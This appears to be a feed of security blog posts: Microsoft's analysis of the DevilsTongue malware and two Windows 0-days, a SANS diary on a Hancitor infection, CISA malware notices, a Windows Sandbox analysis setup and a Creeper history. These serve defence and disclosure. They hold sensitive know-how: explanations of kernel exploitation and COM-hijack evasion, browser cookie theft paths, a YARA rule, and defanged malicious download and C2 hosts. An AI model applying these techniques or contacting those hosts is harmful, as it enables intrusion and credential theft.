We continue to garner accolades for this approach and are now proud to serve some of the world’s largest brands, in addition to being a frequent contributor to the security community.

Naturally, many changes have taken place in infosec over time. Cyber awareness has increased and threats have evolved. We felt it was time for another breakthrough in the way security teams conduct malware analysis in order to stay current with modern IR/SOC challenges. Working with a variety of security teams we have learned a few things along the way.

1. Malware analysis is not just about file sandboxing. About 80% of malware-related alerts do not point to a specific file but rather a suspicious endpoint activity. Security teams are looking to analyze many different artifacts, including memory dumps, URLs, disk images, procdumps and live machines. From in-house scripts and sandboxes, to unpacking and static analysis engines, they currently must leverage a number of tools just to accomplish a single investigation.

2. TMI. Simplicity is key. Teams are discouraged by tools that provide information only experienced reverse engineers can understand. As a result, incidents are being escalated from lower tiers too quickly because of the skills gap that exists. Security teams are looking to lower this barrier for conducting malware analysis.

3. Context is lacking. Sandboxes produce vague results that lack the context needed to answer necessary questions. “Trojan.Generic” or threat score 41 out of 100 sound familiar?

Taking this into account, we have reimagined what a modern malware analysis experience should look like:

1. Consolidated: Cover every possible malware incident. Scan artifacts from any malware-related incident (all file types, disk and memory images, and URLs) using all necessary analysis techniques (genetic code analysis, sandboxing, static analysis, unpacking, memory analysis) under one platform.

2. Simplified: Suitable for all skill levels, with no vague responses and a simple bottom line. Answer critical investigation questions: Is it a false positive? What is the malware family? What does it do? How should I respond?

3. Built for automation: There are more integrations among security products than ever before. This should extend to malware analysis and DFIR. A modern malware analysis platform should provide easy ways to automate IR workflows with tools like SOAR, EDR and Volatility.

Today, I’m proud to announce major new capabilities that will help Intezer Analyze users make this vision a reality. An all-in-one malware analysis experience with an emphasis on simplicity and consolidation of tools under one platform.

Some of our new capabilities include:

* Support for analyzing non-binary formats (e.g., Microsoft Office documents and PDF files)

* Sandboxing capabilities and behavior analysis

* Automatic extraction of Indicators of Compromise (IoCs)

* Mapping capabilities to the MITRE ATT&CK® matrix using static code analysis

* Improved UI and simplified reports

* Plus much more coming on our roadmap soon, including URL scanning and analyzing phishing emails

See it live or register for our upcoming webcast where we will show you how to leverage the platform to deal with attacks like CobaltStrike and Sofacy.

I invite security teams of all sizes and skill levels to try this new malware analysis experience. Sign up for free at


The post Reimagining the Malware Analysis Experience appeared first on Intezer.


The FortiGuard Labs team recently discovered a new phishing campaign with a fresh malware delivered by a Word document which is designed to steal crypto wallet information and credentials from victims’ infected devices. Learn more in our analysis.


We discovered a new malware that targets online gambling companies in China via a watering hole attack, in which visitors are tricked into downloading a malware loader disguised as a legitimate installer for well-known apps such as Adobe Flash Player or Microsoft Silverlight.


The Trend Micro research paper, “2020 Report on Threats Affecting ICS Endpoints,” presents findings on ICS endpoints and the threats that plague them. From these findings, we rounded up the list of the top ten countries with the most malware and grayware detections.

The Microsoft Threat Intelligence Center (MSTIC) alongside the Microsoft Security Response Center (MSRC) has uncovered a private-sector offensive actor, or PSOA, that we are calling SOURGUM in possession of now-patched, Windows 0-day exploits (CVE-2021-31979 and CVE-2021-33771).

Private-sector offensive actors are private companies that manufacture and sell cyberweapons in hacking-as-a-service packages, often to government agencies around the world, to hack into their targets’ computers, phones, network infrastructure, and other devices. With these hacking packages, usually the government agencies choose the targets and run the actual operations themselves. The tools, tactics, and procedures used by these companies only adds to the complexity, scale, and sophistication of attacks. We take these threats seriously and have moved swiftly alongside our partners to build in the latest protections for our customers.

MSTIC believes SOURGUM is an Israel-based private-sector offensive actor. We would like to thank the Citizen Lab, at the University of Toronto’s Munk School, for sharing the sample of malware that initiated this work and their collaboration during the investigation. In their blog, Citizen Lab asserts with high confidence that SOURGUM is an Israeli company commonly known as Candiru. Third-party reports indicate Candiru produces “hacking tools [that] are used to break into computers and servers”.  

As we shared in the Microsoft on the Issues blog, Microsoft and Citizen Lab have worked together to disable the malware being used by SOURGUM that targeted more than 100 victims around the world including politicians, human rights activists, journalists, academics, embassy workers, and political dissidents. To limit these attacks, Microsoft has created and built protections into our products against this unique malware, which we are calling DevilsTongue. We have shared these protections with the security community so that we can collectively address and mitigate this threat. We have also issued a software update that will protect Windows customers from the associated exploits that the actor used to help deliver its highly sophisticated malware.

SOURGUM victimology

Media reports (1, 2, 3) indicate that PSOAs often sell Windows exploits and malware in hacking-as-a-service packages to government agencies. Agencies in Uzbekistan, United Arab Emirates, and Saudi Arabia are among the list of Candiru’s alleged previous customers. These agencies, then, likely choose whom to target and run the cyberoperations themselves.

Microsoft has identified over 100 victims of SOURGUM’s malware, and these victims are as geographically diverse as would be expected when varied government agencies are believed to be selecting the targets. Approximately half of the victims were found in Palestinian Authority, with most of the remaining victims located in Israel, Iran, Lebanon, Yemen, Spain (Catalonia), United Kingdom, Turkey, Armenia, and Singapore. To be clear, the identification of victims of the malware in a country doesn’t necessarily mean that an agency in that country is a SOURGUM customer, as international targeting is common.

Any Microsoft 365 Defender and Microsoft Defender for Endpoint alerts containing detection names for the DevilsTongue malware name are signs of compromise by SOURGUM’s malware. We have included a comprehensive list of detection names below for customers to perform additional hunting in their environments.


SOURGUM appears to use a chain of browser and Windows exploits, including 0-days, to install malware on victim boxes. Browser exploits appear to be served via single-use URLs sent to targets on messaging applications such as WhatsApp.

During the investigation, Microsoft discovered two Windows 0-day exploits for vulnerabilities tracked as CVE-2021-31979 and CVE-2021-33771, both of which have been fixed in the July 2021 security updates. These vulnerabilities allow privilege escalation, giving an attacker the ability to escape browser sandboxes and gain kernel code execution. If customers have taken the July 2021 security update, they are protected from these exploits.

CVE-2021-31979 fixes an integer overflow within Windows NT-based operating system (NTOS). This overflow results in an incorrect buffer size being calculated, which is then used to allocate a buffer in the kernel pool. A buffer overflow subsequently occurs while copying memory to the smaller-than-expected destination buffer. This vulnerability can be leveraged to corrupt an object in an adjacent memory allocation. Using APIs from user mode, the kernel pool memory layout can be groomed with controlled allocations, resulting in an object being placed in the adjacent memory location. Once corrupted by the buffer overflow, this object can be turned into a user mode to kernel mode read/write primitive. With these primitives in place, an attacker can then elevate their privileges.

CVE-2021-33771 addresses a race condition within NTOS resulting in the use-after-free of a kernel object. By using multiple racing threads, the kernel object can be freed, and the freed memory reclaimed by a controllable object. Like the previous vulnerability, the kernel pool memory can be sprayed with allocations using user mode APIs with the hopes of landing an object allocation within the recently freed memory. If successful, the controllable object can be used to form a user mode to kernel mode read/write primitive and elevate privileges.

DevilsTongue malware overview

DevilsTongue is a complex modular multi-threaded piece of malware written in C and C++ with several novel capabilities. Analysis is still on-going for some components and capabilities, but we’re sharing our present understanding of the malware so defenders can use this intelligence to protect networks and so other researchers can build on our analysis.

For files on disk, PDB paths and PE timestamps are scrubbed, strings and configs are encrypted, and each file has a unique hash. The main functionality resides in DLLs that are encrypted on disk and only decrypted in memory, making detection more difficult. Configuration and tasking data is separate from the malware, which makes analysis harder.  DevilsTongue has both user mode and kernel mode capabilities. There are several novel detection evasion mechanisms built in. All these features are evidence that SOURGUM developers are very professional, have extensive experience writing Windows malware, and have a good understanding of operational security.

When the malware is installed, a first-stage ‘hijack’ malware DLL is dropped in a subfolder of C:Windowssystem32IME; the folders and names of the hijack DLLs blend with legitimate names in the IME directories. Encrypted second-stage malware and config files are dropped into subfolders of C:Windowssystem32config with a .dat file extension. A third-party legitimate, signed driver physmem.sys is dropped to the system32 folder. A file called WimBootConfigurations.ini is also dropped; this file has the command for following the COM hijack. Finally, the malware adds the hijack DLL to a COM class registry key, overwriting the legitimate COM DLL path that was there, achieving persistence via COM hijacking.

From the COM hijacking, the DevilsTongue first-stage hijack DLL gets loaded into a svchost.exe process to run with SYSTEM permissions. The COM hijacking technique means that the original DLL that was in the COM registry key isn’t loaded. This can break system functionality and trigger an investigation that could lead to the discovery of the malware, but DevilsTongue uses an interesting technique to avoid this. In its DllMain function it calls LoadLibrary on the original COM DLL so it is correctly loaded into the process. DevilsTongue then searches the call stack to find the return address of LoadLibraryExW (i.e., the function currently loading the DevilsTongue DLL),  which would usually return the base address of the DevilsTongue DLL.

Once the LoadLibraryExW return address has been found, DevilsTongue allocates a small buffer with shellcode that puts the COM DLL’s base address (imecfmup.7FFE49060000 in Figure 1) into the rax register and then jumps to the original return address of LoadLibraryExW (svchost.7FF78E903BFB in Figures 1 and 2). In Figure 1 the COM DLL is named imecfmup rather than a legitimate COM DLL name because some DevilsTongue samples copied the COM DLL to another location and renamed it.

Figure 1. DevilsTongue return address modification shellcode

DevilsTongue then swaps the original LoadLibraryExW return address on the stack with the address of the shellcode so that when LoadLibraryExW returns it does so into the shellcode (Figures 2 and 3). The shellcode replaces the DevilsTongue base address in rax with the COM DLL’s base address, making it look like LoadLibraryExW has returned the COM DLL’s address. The svchost.exe host process now uses the returned COM DLL base address as it usually would.

Figure 2. Call stack before stack swap, LoadLibraryExW in kernelbase returning to svchost.exe (0x7FF78E903BFB)

Figure 3. Call stack after stack swap, LoadLibraryExW in kernelbase returning to the shellcode address (0x156C51E0000 from Figure 1)

This technique ensures that the DevilsTongue DLL is loaded by the svchost.exe process, giving the malware persistence, but that the legitimate COM DLL is also loaded correctly so there’s no noticeable change in functionality on the victim’s systems.

After this, the hijack DLL then decrypts and loads a second-stage malware DLL from one of the encrypted .dat files. The second-stage malware decrypts another .dat file that contains multiple helper DLLs that it relies on for functionality.

DevilsTongue has standard malware capabilities, including file collection, registry querying, running WMI commands, and querying SQLite databases. It’s capable of stealing victim credentials from both LSASS and from browsers, such as Chrome and Firefox. It also has dedicated functionality to decrypt and exfiltrate conversations from the Signal messaging app.

It can retrieve cookies from a variety of web browsers. These stolen cookies can later be used by the attacker to sign in as the victim to websites to enable further information gathering. Cookies can be collected from these paths (* is a wildcard to match any folders):

%LOCALAPPDATA%ChromiumUser Data*Cookies
%LOCALAPPDATA%GoogleChromeUser Data*Cookies
%LOCALAPPDATA%UCBrowserUser Data_i18n*Cookies.9
%LOCALAPPDATA%YandexYandexBrowserUser Data*Cookies
%APPDATA%Apple ComputerSafariCookiesCookies.binarycookies
%APPDATA%Opera SoftwareOpera StableCookies

Interestingly, DevilsTongue seems able to use cookies directly from the victim’s computer on websites such as Facebook, Twitter, Gmail, Yahoo,, Odnoklassniki, and Vkontakte to collect information, read the victim’s messages, and retrieve photos. DevilsTongue can also send messages as the victim on some of these websites, appearing to any recipient that the victim had sent these messages. The capability to send messages could be weaponized to send malicious links to more victims.

Alongside DevilsTongue a third-party signed driver is dropped to C:Windowssystem32physmem.sys. The driver’s description is “Physical Memory Access Driver,” and it appears to offer a “by-design” kernel read/write capability. This appears to be abused by DevilsTongue to proxy certain API calls via the kernel to hinder detection, including the capability to have some of the calls appear from other processes. Functions capable of being proxied include CreateProcessW, VirtualAllocEx, VirtualProtectEx, WriteProcessMemory, ReadProcessMemory, CreateFileW and RegSetKeyValueW.

Prevention and detection

To prevent compromise from browser exploits, it’s recommended to use an isolated environment, such as a virtual machine, when opening links from untrusted parties. Using a modern version of Windows 10 with virtualization-based protections, such as Credential Guard, prevents DevilsTongue’s LSASS credential-stealing capabilities. Enabling the attack surface reduction rule “Block abuse of exploited vulnerable signed drivers” in Microsoft Defender for Endpoint blocks the driver that DevilsTongue uses. Network protection blocks known SOURGUM domains.

Detection opportunities

This section is intended to serve as a non-exhaustive guide to help customers and peers in the cybersecurity industry to detect the DevilsTongue malware. We’re providing this guidance with the expectation that SOURGUM will likely change the characteristics we identify for detection in their next iteration of the malware. Given the actor’s level of sophistication, however, we believe that outcome would likely occur irrespective of our public guidance.

File locations

The hijack DLLs are in subfolders of system32ime with names starting with ‘im’. However, they are blended with legitimate DLLs in those folders. To distinguish between the malicious and benign, the legitimate DLLs are signed (on Windows 10) whereas the DevilsTongue files aren’t. Example paths:


 The DevilsTongue configuration files, which are AES-encrypted, are in subfolders of C:Windowssystem32config and have a .dat extension. The exact paths are victim-specific, although some folder names are common across victims. As the files are AES-encrypted, any files whose size mod 16 is 0 can be considered as a possible malware config file. The config files are always in new folders, not the legitimate existing folders (e.g., on Windows 10, never in Journal, systemprofile, TxR etc.). Example paths:


Commonly reused folder names in the config file paths:


The .ini reg file has the unique name WimBootConfigurations.ini and is in a subfolder of system32ime. Example paths:


The Physmem driver is dropped into system32:



The two COM keys that have been observed being hijacked for persistence are listed below with their default clean values. If their default value DLL is in the system32ime folder, the DLL is likely DevilsTongue.

HKLMSOFTWAREClassesCLSID{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}InprocServer32 = %systemroot%system32wbemwmiutils.dll (clean default value)
HKLMSOFTWAREClassesCLSID{7C857801-7381-11CF-884D-00AA004B2E24}InProcServer32 = %systemroot%system32wbemwbemsvc.dll (clean default value)

File content and characteristics

This Yara rule can be used to find the DevilsTongue hijack DLL:

import “pe”
rule DevilsTongue_HijackDll
description = “Detects SOURGUM’s DevilsTongue hijack DLL”
author = “Microsoft Threat Intelligence Center (MSTIC)”
date = “2021-07-15”
$str1 = “windows.old\windows” wide
$str2 = “NtQueryInformationThread”
$str3 = “dbgHelp.dll” wide
$str4 = “StackWalk64”
$str5 = “ConvertSidToStringSidW”
$str6 = “S-1-5-18” wide
$str7 = “SMNew.dll” // DLL original name
// Call check in stack manipulation
// B8 FF 15 00 00   mov     eax, 15FFh
// 66 39 41 FA      cmp     [rcx-6], ax
// 74 06            jz      short loc_1800042B9
// 80 79 FB E8      cmp     byte ptr [rcx-5], 0E8h ; ‘è’
$code1 = {B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8}
// PRNG to generate number of times to sleep 1s before exiting
// 44 8B C0 mov r8d, eax
// B8 B5 81 4E 1B mov eax, 1B4E81B5h
// 41 F7 E8 imul r8d
// C1 FA 05 sar edx, 5
// 8B CA    mov ecx, edx
// C1 E9 1F shr ecx, 1Fh
// 03 D1    add edx, ecx
// 69 CA 2C 01 00 00 imul ecx, edx, 12Ch
// 44 2B C1 sub r8d, ecx
// 45 85 C0 test r8d, r8d
// 7E 19    jle  short loc_1800014D0
$code2 = {44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19}
filesize < 800KB and
uint16(0) == 0x5A4D and
(pe.characteristics & pe.DLL) and
4 of them or
($code1 and $code2) or
(pe.imphash() == “9a964e810949704ff7b4a393d9adda60”)

Microsoft Defender Antivirus detections

Microsoft Defender Antivirus detects DevilsTongue malware with the following detections:


Microsoft Defender for Endpoint alerts

Alerts with the following titles in the security center can indicate DevilsTongue malware activity on your network:

COM Hijacking
Possible theft of sensitive web browser information
Stolen SSO cookies 

Azure Sentinel query

To locate possible SOURGUM activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

Indicators of compromise (IOCs)

No malware hashes are being shared because DevilsTongue files, except for the third part driver below, all have unique hashes, and therefore, are not a useful indicator of compromise.

Physmem driver

Note that this driver may be used legitimately, but if it’s seen on path C:Windowssystem32physmem.sys then it is a high-confidence indicator of DevilsTongue activity. The hashes below are provided for the one driver observed in use.

MD5: a0e2223868b6133c5712ba5ed20c3e8a
SHA-1: 17614fdee3b89272e99758983b99111cbb1b312c
SHA-256: c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d



The post Protecting customers from a private-sector offensive actor using 0-day exploits and DevilsTongue malware appeared first on Microsoft Security Blog.


On Thursday 2021-07-08, for a short while when Hancitor was initially active, if any victims clicked on a malicious link from the malspam, they would receive a XLL file instead of a malicious Word doc.  I tried one of the email links in my lab and received the malicious XLL file.  After other researchers reported they were receiving Word documents, I tried a few hours later and received a Word document instead.

Shown above:  Flow chart for my first Hancitor infection on 2021-07-08.

Since November 2020, Hancitor has consistently followed specific patterns of infection activity, and my previous diary from January 2021 is typical of what I’ve seen.  Only one change has happened recently.  Since June 8th 2021, malicious spam (malspam) pushing Hancitor switched from links in their messages to using URLs, which was initially reported by @James_inthe_box, @mesa_matt, and @executemalware.

Shown above:  Flow chart for my second Hancitor infection on 2021-07-08 (what I normally see).

I’ve also seen these Google feedproxy URLs used for Hancitor infections, but I had not seen the XLL files until now.

What is an XLL file?

XLL files are Excel add-in files.  They’re DLL files specifically designed to be run by Microsoft Excel.  Think of an XLL file as an “Excel DLL.”

The emails

As usual, emails for this wave of Hancitor used a DocuSign theme, and they spoofed cabanga[.]com as the sending domain.  Just like in recent weeks, links went to a Google feedproxy URL.

Shown above:  Example of malspam pushing Hancitor from 2021-07-08.

The Google feedproxy URL leads to a malicious page on a compromised webite designed to send the initial malicious file and redirect the browser to DocuSign’s website.  I’ve described the process here and here.  This process makes it appear as if the file was offered by DocuSign, when it was actually sent through a malicious web page.

Shown above:  The website for DocuSign appears in a victim’s browser immediately after a malicious file is offered for download.

Remember, this malicious activity is not caused by DocuSign.  DocuSIgn is one of many companies that cybercriminals impersonate when distributing malware like Hancitor.  DocuSign is aware of this long-running effort by the criminals behind Hancitor, and the company has guidelines for dealing with this sort of malicious activity.

Running the XLL

When opening the XLL file, Excel asks if you want to enable the add-in as shown below.

Shown above:  Opening the malicious XLL file in Excel.

The default option was to leave the add-in disabled.  But when I opened the XLL file in my lab enviornment, I enabled all code for the add-in.  Excel immediately ran the add-in and closed.  I didn’t see any sort of fake template like we usually see when Hancitor uses a Word document as the initial file.

Infection traffic

During my first infection run with the XLL file, most of the traffic followed known patterns for Hancitor and Cobalt Strike, I saw two additional URLs as noted below.

Shown above: Traffic from my first Hancitor infection filtered in Wireshark, with the two unusual URLs noted.

Thes two URLs returned files that were saved to my Windows client in the C:UsersPublic directory.  The first URL returned an HTML file that was saved as res32.hta.  That .hta file retrieved an EXE for Hancitor which was saved as snd32sys.exe.

Shown above:  HTML (.hta) and EXE files saved the Windows host.

Hancitor showed a build number of 0707in2_wvcr in C2 traffic caused by the EXE.  During my second infection run with a Hancitor DLL, I saw a build number of 0707_wvcr,

Shown above:  C2 traffic from Hancitor EXE during my first infection.

Shown above:  C2 traffic from Hancitor DLL during my second infection.

Indicators of Compromise (IOCs)

This Github page contains 35 Google feedproxy URLs and 35 associated URLs used to send the initial malicious file.  Other indicators follow.

SHA256 hash: 73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71

File size: 24,488 bytes
File name: 0708_0112181856.xll
File description: Excel add-in (an “Excel DLL”)

SHA256 hash: da92436d2bbcdef52b11ace6e2e063e9971cefc074d194550bd425305c97cdd5

File size: 8,419 bytes
File location: hxxp://srand04rf[.]ru/92375234.xml
File location: C:UsersPublicres32.hta
File description: HTML file used to retrieve Hancitor EXE

SHA256 hash: 3db14214a9eb98b3b5abffcb314c808a25ed82456ce01251d31e8ea960f6e4e6

File size: 763,392 bytes
File location: hxxp://srand04rf[.]ru/08.jpg
File location: C:UsersPublicsnd32sys.exe
File description: Hancitor EXE

SHA256 hash: b4d402b4ab3b5a5568f35562955d5d05357a589ccda55fde5a2c166ef5f15699

File size: 898,048 bytes
File name: 0708_3355614568218.doc
File description: Word doc with macros for Hancitor

SHA256 hash: 4dc9d5ee1debdba0388fbb112d4bbbc01bb782f015e798cced3fc2edb17ac557

File size: 274,432 bytes
File location: C:Users[username]AppDataRoamingMicrosoftTemplateniberius.dll
File description: Hancitor DLL
Run method: rundll32.exe [filename],ONOQWPYIEIR

SHA256 hash: dee4bb7d46bbbec6c01dc41349cb8826b27be9a0dcf39816ca8bd6e0a39c2019

File size: 272,910 bytes
File location: hxxp://srand04rf[.]ru/7hfjsdfjks.exe
File description: EXE for Ficker Stealer malware
Note: This file was first submitted to VirusTotal on 2021-06-09.

Traffic related to Hancitor:

8.211.241[.]0 port 80 – srand04rf[.]ru – GET /92375234.xml
8.211.241[.]0 port 80 – srand04rf[.]ru – GET /08.jpg
port 80 – – GET /  [not inherently malicious]
77.222.42[.]67 port 80 – sudepallon[.]com – POST /8/forum.php
194.147.78[.]155 port 80 – anspossthrly[.]ru – POST /8/forum.php
194.147.115[.]74 port 80 – thentabecon[.]ru – POST/8/forum.php

Traffic related to Ficker Stealer:

8.211.241[.]0 port 80 – srand04rf[.]ru – GET /7hfjsdfjks.exe
port 80 – – GET /?format=xml  [not inherently malicious]
95.213.179[.]67 port 80 – pospvisis[.]com – TCP traffic

Traffic related to Cobalt Strike:

8.211.241[.]0 port 80 – srand04rf[.]ru – GET /0707s.bin
8.211.241[.]0 port 80 – srand04rf[.]ru – GET /0707.bin
191.101.17[.]21 port 443 – HTTPS traffic
191.101.17[.]21 port 80 – 191.101.17[.]21 – GET /5lyB
191.101.17[.]21 port 80 – 191.101.17[.]21 – GET /IE9CompatViewList.xml
191.101.17[.]21 port 80 – 191.101.17[.]21 – POST /submit.php?id=[9-digit number]

Final words

A pcap of the infection traffic from my first infection run (with the XLL file) can be found here.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.


Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new [Malware Analysis Report (MAR) on DarkSide Ransomware] and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.


Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new [Malware Analysis Report (MAR) on DarkSide Ransomware] and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.


Safe at home, apparently, but not so safe overseas.

By Asheer Malhotra, Justin Thattil and Kendall McKay.

Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations. Cisco Talos’ previous research has mainly linked this…

[[ This is only the beginning! Please visit the blog for the complete entry ]]


Original release date: April 22, 2021

CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advance persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement.

CISA encourages organizations to review AR21-112A for more information.

This product is provided subject to this Notification and this Privacy & Use policy.



Original release date: April 15, 2021

CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.

The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).

CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information: 

CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations

This product is provided subject to this Notification and this Privacy & Use policy.

Microsoft describes the “Windows Sandbox supports simple configuration files, which provide a minimal set of customization parameters for Sandbox. […] Windows Sandbox configuration files are formatted as XML and are associated with Sandbox via the .wsb file extension.”[6]

Since both, the latest version elastic-agent (7.11+) support antivirus detection, I followed the instructions listed here [1] to configure an agent to test its detection capabilities. For my workstation, I used VMware with a fully patched Windows 10 and saved the current configuration with a snapshot. I wanted to combine both of these features; the elastic-agent and the Microsoft sandbox feature [4][5][6] to analyze my malware sample. Since the Microsoft sandbox doesn’t retain anything after it is shutdown, I figure this would be a good alternative vs. restoring my previous VMware snapshot every time I tested a suspicious filename.

One minor inconvenient, if I want to use the agent, I need to add it every time to Elasticsearch to use it. If the elastic-agent isn’t installed, Microsoft Defender is enabled. Here is a list of tools to either install or consider installing in the sandbox when it starts:

Elastic-agent with malware policy (in VMware client and Sandbox client)
MS SysMon
Consider adding: PowerShell Script Block Logging, example here
Wireshark to capture traffic from host
Other browsers: Chrome & Firefox
Internet Services Simulation Suite: INetSim
Didier Stevens suite of tools
Proxy setup on VMware client to monitor traffic
Any other tools you might find useful during the analysis such as this package by @mentebinaria

When starting the sandbox, using a script configured for this purpose, it can automatically load the tools needed with a batch file (MalwareAnalysis.wsb). Here is my example:


Because everything is deleted when you shutdown the sandbox (including the browser, it must be reloaded with the current version every time), I needed a way to automatically start/add/load/update what I needed to perform some basic analysis. I use a batch file I preconfigured with everything I needed to accomplish this task. Here is what I have (C:SandboxSBConfig.bat):

REM Copy elastic-agent to C:Program Files
C:WindowsSystem32xcopy.exe /i /s C:UsersWDAGUtilityAccountDesktopSandboxelastic-agent “C:Program Fileselastic-agent”

REM Install Sysmon64, vcredist_x86
C:UsersWDAGUtilityAccountDesktopSandboxSysmon64.exe -i -accepteula
C:UsersWDAGUtilityAccountDesktopSandboxvcredist_x86.exe /q

REM Add Elastic certificate authority to Sandbox
C:WindowsSystem32certutil.exe -addstore root C:UsersWDAGUtilityAccountDesktopSandboxca.crt
C:WindowsSystem32certutil.exe -addstore root C:UsersWDAGUtilityAccountDesktopSandboxstargate.crt

REM Install new Microsoft Edge
start /wait C:UsersWDAGUtilityAccountDesktopSandboxMicrosoftEdgeEnterpriseX64.msi /quiet /norestart

REM Install Python
C:UsersWDAGUtilityAccountDesktopSandboxpython-3.9.2-amd64.exe /quiet InstallAllUsers=1 PrependPath=1 Include_test=0

REM Execute PowerShell scripts
Powershell.exe -executionpolicy remotesigned -File C:UsersWDAGUtilityAccountDesktopSandboxChangeExecutionPolicy.ps1
Powershell.exe -executionpolicy remotesigned -File C:UsersWDAGUtilityAccountDesktopSandboxScriptBlockLogging.ps1

REM Install Wireshark
REM Install npcap manually. Silent only supported with OEM
C:UsersWDAGUtilityAccountDesktopSandboxWireshark-win64-3.4.4.exe /S /D /desktopicon=yes

The file npcap is last because I’m using the free edition vs. the OEM which will ask to finish the installation after it starts the installer. Before you can enable ScriptBlockLogging in the Sandbox, I need to enable the PowerShell ExecutionPolicy to allow RemoteSigned. This is the command in my script to make that change (ChangeExecutionPolicy.ps1):

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force

To verify the change was applied, as PowerShell admin, execute the following command:

Get-ExecutionPolicy -List

Producing the following result:

Following the example listed here in this Elastic blog, it is time to create a policy, add the elastic-agent to Elasticsearch (pre-copied with the batch file SBConfig.bat) to run the sample file and monitor its activity. This is the four application part of the policy I configured for my agent:

After launching the script MalwareAnalysis.wsb to start the Sandbox, load, copy and install all the applications from the batch file, it is time to add the elastic-agent to the server, I am ready to launch the suspected malware file for analysis. Last month, my honeypot was uploaded a crypto miner file photo.scr and I’m going to use this file to submit the elastic-agent for analysis.

→ To view the results in Kibana, navigate Security -> Overview -> Detection alert trend
I look for activity that would indicate an alert triggered by malware and filter for the value, then View alerts to examine the flow of the activity. I can then select Analyze the content as to what this photo.scr file accessed or installed on the client. The agent captured 3 alerts:

Next is to expand one of those alerts and analyze the activity, the elastic-agent identified: 1 library, 53 networks and 7 registry:

Network Activty

Registry Activity

Each one of the can be expanded to drill further into what happened on the host.

Indicator of Compromise

807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d  Photo.scr
[2021-02-08 07:06:36] [1693] [ftp_21_tcp 29914] [] info: Stored 1578496 bytes of data



This is one of many tasks Windows Sandbox could be used such as accessing suspicious sites, running untrusted software and scripts starting with Windows network or vGPU disable, without the fear of impacting your normal Windows installation. These various tasks can be accomplished by creating  separate .wsb Sanbox script.


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Original release date: March 17, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals are using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA’s Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.


This product is provided subject to this Notification and this Privacy & Use policy.

If you have any interest in the history of malicious code, chances are you’ve heard or read somewhere that the first piece of malware ever created was a computer worm called Creeper and that spread itself through the ARPANET in 1971. Some sources even mention that it might have been on this very date, i.e. exactly 50 years ago[1].

So does malware really turn 50 today?

Not likely. Even leaving aside that according to some sources[2], there may have been a fork bomb[3] program created all the way back in 1969, and therefore the oldest malware might already be over 50 years old, the simple fact is that Creeper wasn’t malware in any sense of the word… Alhough it was probably the first example of a (benign) computer worm ever created.

In the multiple retellings of its legend that may be found both online and in print, we have, however, a prime example of something which is unfortunately relatively common (not just) in infosec. That is repeating of interesting-looking information without checking for any original sources, which might provide context to it. I don’t mind admitting that this is a pet peeve of mine[4] and so I thought that on this day, which may or may not mark the 50th anniversary of the original “run” of Creeper, it might be a good idea to take a look at what we really know about it.

